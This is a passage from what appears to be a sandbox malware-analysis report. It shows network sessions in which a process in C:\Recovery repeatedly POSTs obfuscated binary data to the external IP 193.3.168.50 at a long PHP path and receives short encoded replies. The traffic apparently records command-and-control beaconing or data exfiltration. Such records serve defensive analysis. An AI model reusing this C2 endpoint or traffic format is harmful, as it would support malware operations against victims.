Dec 4, 2024 15:46:03.569072962 CET	2472	OUT	Data Raw: 75 5a 2b 31 72 62 47 66 39 56 69 4e 45 31 63 6f 43 39 4d 6e 50 54 68 41 72 32 72 4b 49 49 61 78 2b 69 52 6a 63 65 46 59 58 4b 61 5a 74 72 35 59 47 37 2b 63 50 65 46 52 73 32 2f 6e 66 6e 52 57 64 56 56 4f 38 65 43 61 66 7a 52 69 33 78 55 76 77 6a Data Ascii: uZ+1rbGf9ViNE1coC9MnPThAr2rKIIax+iRjceFYXKaZtr5YG7+cPeFRs2/nfnRWdVVO8eCafzRi3xUvwjeETtGRPTH7JXmACOXQth62iFuiEPeun/nQptv3ajvvwQqv5yCv1VrZmrGvnlzXwNHMIZ1sD81JC5kLHmDvIns/qvJzdVn8R71b1jm4vuo2ueD2rDIe26rw0rxPzfLInsMMhK6+QYJ8tWUKMmlRGb3KMCmgt/A7pvY
Dec 4, 2024 15:46:03.569097042 CET	2472	OUT	Data Raw: 4d 73 6a 54 68 4f 4b 39 32 6b 77 64 33 39 49 38 53 36 73 45 77 35 62 48 33 35 6d 36 4e 6c 2b 73 4f 2b 47 73 56 78 56 59 76 54 59 6c 66 2f 4b 44 4e 57 49 5a 42 68 76 57 4f 55 4d 51 52 7a 34 6d 64 38 4c 5a 57 50 5a 6d 2b 46 38 4b 30 72 37 32 39 2f Data Ascii: MsjThOK92kwd39I8S6sEw5bH35m6Nl+sO+GsVxVYvTYlf/KDNWIZBhvWOUMQRz4md8LZWPZm+F8K0r729/j2J+W7c807KmqhrlsAn4zmfMV0HznhTONWrRWvCDMzhYPNndOoiFmhWCbTM7vIsCYTpwNcQ/IfQvBl5fLyDcHch+tTlk08KH7d6GWyt+aYvaBB/uhVkKB+Snf0f8X3P70OmEJFm1eud7+w7Kyb41Qkp/e3iQpjQwO
Dec 4, 2024 15:46:03.569192886 CET	4944	OUT	Data Raw: 77 78 43 4c 50 7a 76 42 73 4d 66 70 45 46 7a 5a 61 35 7a 48 6d 46 66 6d 74 34 6f 2f 72 72 42 68 48 69 61 6e 2b 75 4b 53 6b 53 6e 78 69 63 33 4d 57 79 66 55 55 64 69 36 5a 6c 71 43 77 32 72 50 78 51 4e 47 75 35 42 67 4d 2b 54 56 36 6e 52 4e 50 4f Data Ascii: wxCLPzvBsMfpEFzZa5zHmFfmt4o/rrBhHian+uKSkSnxic3MWyfUUdi6ZlqCw2rPxQNGu5BgM+TV6nRNPODbi52fy4ee9G+hsK0vfSRTp09oG1Hb2/rB2o4ROvVIw+XbY3F5AfEFm73H3PGDclq+aKfpsQwbbSz45G4FAcVcWlI4a2/yYUyKePfScuTQjRvu+TvK/gbTpZjAzPYbS+8ZF6e3Ip0y9y4MI7cYCZgBLXP9DQt5cLX
Dec 4, 2024 15:46:03.688883066 CET	2472	OUT	Data Raw: 51 77 58 63 46 79 6b 59 64 68 38 51 38 6f 42 48 57 65 6a 53 44 65 4d 59 7a 55 2b 53 6f 4a 6c 41 61 63 76 51 30 74 73 58 6e 73 31 74 2f 55 46 56 4e 51 6b 58 34 33 61 48 75 72 61 39 7a 43 41 54 54 73 4b 75 50 77 72 76 50 4a 67 64 30 42 6c 47 33 44 Data Ascii: QwXcFykYdh8Q8oBHWejSDeMYzU+SoJlAacvQ0tsXns1t/UFVNQkX43aHura9zCATTsKuPwrvPJgd0BlG3Dsk3Rlk6Al7ctItoXrxxnzhduQzQUs/Y+PREvcCZ/dDicRDmGUvY7E6NU4lIWpB/6I23Z9rfheMnZy11sEWyvLpH9uFDPlRfYw62yE/xkmdO6YmP55Qay1MLzLTr5VscMVrx5n9VCFzXSq4x8y2Q6u8abEvllwYm7D
Dec 4, 2024 15:46:03.688937902 CET	2472	OUT	Data Raw: 32 79 57 38 41 6a 38 46 70 72 32 56 46 62 4b 54 72 56 55 4f 4c 61 4a 73 6c 44 56 74 2f 59 66 54 56 2b 79 43 6c 50 74 75 79 30 4e 56 34 62 38 66 74 75 48 63 62 52 54 69 6d 2b 41 4f 37 47 30 49 56 61 6b 38 6d 48 56 36 43 47 51 77 45 6f 54 49 4c 47 Data Ascii: 2yW8Aj8Fpr2VFbKTrVUOLaJslDVt/YfTV+yClPtuy0NV4b8ftuHcbRTim+AO7G0IVak8mHV6CGQwEoTILGFqvUZSd0YwbNyQTMw19jasdWbkBV6pveyv9ZzIJXW1EcwZCA2rMGEOH0Ji1NVm9tA4I1NP5sh4LBhGj4IDi++30RPw9B/06thb2jkEStHMUCOFglfMj79lH8P9Ss2Rgu+pPjJddE7jaKjcQknGF+ae9yKnDA8ofUs
Dec 4, 2024 15:46:04.327754974 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:04.979415894 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49786	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:03.123858929 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:03.477665901 CET	1012	OUT	Data Raw: 5f 51 5f 52 59 57 5a 52 5a 58 51 52 55 51 5a 5b 50 5e 5d 59 59 5d 57 43 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Q_RYWZRZXQRUQZ[P^]YY]WC^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-/ ?;7=8%!)/.3]0;!"_3A! $T=#G $],=
Dec 4, 2024 15:46:04.363399982 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:04.600893974 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49789	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:04.936645031 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:05.299209118 CET	1012	OUT	Data Raw: 5f 5f 5f 5c 5c 5d 5a 57 5a 58 51 52 55 56 5a 58 50 55 5d 5c 59 52 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ___\\]ZWZXQRUVZXPU]\YRWB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY._/>(<#%:.<X4),-+]'(T!!9Z0,"*=#G $],!
Dec 4, 2024 15:46:06.175472975 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:06.412734032 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49793	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:06.740077019 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:07.301373005 CET	1012	OUT	Data Raw: 5f 5b 5f 58 59 56 5a 55 5a 58 51 52 55 50 5a 5b 50 56 5d 58 59 53 57 47 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _[_XYVZUZXQRUPZ[PV]XYSWG^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.[/&?'!5],<! '9;%,?#!%_3>8"3$)=#G $],
Dec 4, 2024 15:46:07.957398891 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:08.194259882 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49799	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:08.178472996 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:46:08.524741888 CET	1888	OUT	Data Raw: 5f 50 5a 5c 59 5a 5f 57 5a 58 51 52 55 51 5a 52 50 5f 5d 59 59 53 57 43 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _PZ\YZ_WZXQRUQZRP_]YYSWC^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-;9<<[4>^/)[4:#-\%,+#"6$." *#G $],=
Dec 4, 2024 15:46:12.429236889 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:12.669027090 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 02 33 15 0a 57 27 3c 27 50 3c 0a 20 1c 2e 55 23 12 24 2d 22 1c 25 2a 05 55 3e 03 20 03 22 13 00 5d 28 29 28 0d 3e 37 2b 0e 3d 28 20 58 00 1a 26 58 37 31 30 58 2d 29 02 5b 31 2d 04 5b 30 03 2d 5b 2a 3a 3c 0a 29 33 27 0e 24 2e 26 57 3e 0d 0f 52 3b 42 39 16 39 00 26 5d 31 3f 2a 52 0e 17 21 53 3e 07 34 59 37 31 22 0c 3d 21 02 06 28 01 20 0a 33 01 2e 19 20 2d 3a 0c 27 56 29 56 24 31 35 0a 24 16 2b 5a 24 2f 05 01 29 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&3W'<'P< .U#$-"%U> "]()(>7+=( X&X710X-)[1-[0-[:<)3'$.&W>R;B99&]1?*R!S>4Y71"=!( 3. -:'V)V$15$+Z$/) _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49800	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:08.442574978 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:08.792186975 CET	1012	OUT	Data Raw: 5a 5d 5f 5f 5c 5e 5a 54 5a 58 51 52 55 53 5a 5d 50 56 5d 5d 59 5f 57 45 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z]__\^ZTZXQRUSZ]PV]]Y_WE^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.X,X?)<[#,Z=[#)<.(0,7&$>3"V8)=#G $],5
Dec 4, 2024 15:46:09.682246923 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:09.929224968 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49806	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:10.590552092 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:10.964184999 CET	1012	OUT	Data Raw: 5f 50 5f 59 59 58 5a 5e 5a 58 51 52 55 54 5a 5e 50 56 5d 5f 59 58 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _P_YYXZ^ZXQRUTZ^PV]_YXWB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-;0^=?#66,"#$9#3/#"^3#0#=#G $],)
Dec 4, 2024 15:46:11.816489935 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:12.053086996 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49807	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:12.344615936 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:12.705559015 CET	1012	OUT	Data Raw: 5f 5e 5a 59 5c 5c 5f 54 5a 58 51 52 55 52 5a 5d 50 57 5d 59 59 59 57 46 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _^ZY\\_TZXQRURZ]PW]YYYWF^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.;V9^=)(!6:8- 9T.300/8U#%Y$,C##+>#G $],1
Dec 4, 2024 15:46:13.636995077 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:13.875394106 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49814	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:14.119884014 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:14.477729082 CET	1012	OUT	Data Raw: 5a 5a 5f 53 5c 5c 5a 52 5a 58 51 52 55 53 5a 53 50 50 5d 5e 59 53 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZZ_S\\ZRZXQRUSZSPP]^YSWB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.Y;<0 :/?%[ 9$0/?72'.;50?*-#G $],5
Dec 4, 2024 15:46:15.354518890 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:15.610174894 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49820	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:16.354085922 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:16.712109089 CET	1012	OUT	Data Raw: 5f 59 5f 5c 59 56 5a 50 5a 58 51 52 55 50 5a 5c 50 53 5d 5a 59 5d 57 40 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Y_\YVZPZXQRUPZ\PS]ZY]W@^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-,=\?) [46.?>!),-8'72"',E6 '*-#G $],
Dec 4, 2024 15:46:17.590933084 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:17.826694012 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49825	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:17.820818901 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:46:18.165668964 CET	1888	OUT	Data Raw: 5a 59 5f 53 59 5f 5a 57 5a 58 51 52 55 5e 5a 52 50 57 5d 5f 59 5e 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZY_SY_ZWZXQRU^ZRPW]_Y^WB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.,3)X+#46.,=\#90+$<#1%'8B# >=#G $],
Dec 4, 2024 15:46:19.139260054 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:19.372956038 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 03 27 38 38 56 30 02 38 09 2b 1d 02 12 3a 33 05 5a 27 10 3e 1b 32 2a 24 0a 3d 3a 23 11 22 3e 26 58 3f 17 2f 10 3c 24 3f 0b 3d 02 20 58 00 1a 26 59 23 1c 23 05 2e 5f 2c 10 31 3d 35 02 33 2e 3e 02 29 39 37 53 3e 20 37 0d 26 2d 2a 53 29 55 39 54 3b 0a 21 59 3a 00 35 06 25 15 2a 52 0e 17 21 18 2a 10 2c 13 37 08 39 57 29 1f 27 5e 28 11 2b 55 27 28 3a 52 22 2d 29 56 30 20 1c 0a 24 22 22 57 33 38 2f 10 26 01 0e 10 2a 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&'88V08+:3Z'>2$=:#">&X?/<$?= X&Y##._,1=53.>)97S> 7&-S)U9T;!Y:5%R!,79W)'^(+U'(:R"-)V0 $""W38/&* _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49826	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:18.070302963 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:18.430936098 CET	1012	OUT	Data Raw: 5f 5e 5f 59 59 58 5a 56 5a 58 51 52 55 5e 5a 5c 50 57 5d 5d 59 5b 57 44 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _^_YYXZVZXQRU^Z\PW]]Y[WD^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-/V%X(74,,=7_8W.$'<$ >$>(A53;>#G $],
Dec 4, 2024 15:46:19.348412991 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:19.581136942 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49831	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:19.834403992 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1008 Expect: 100-continue
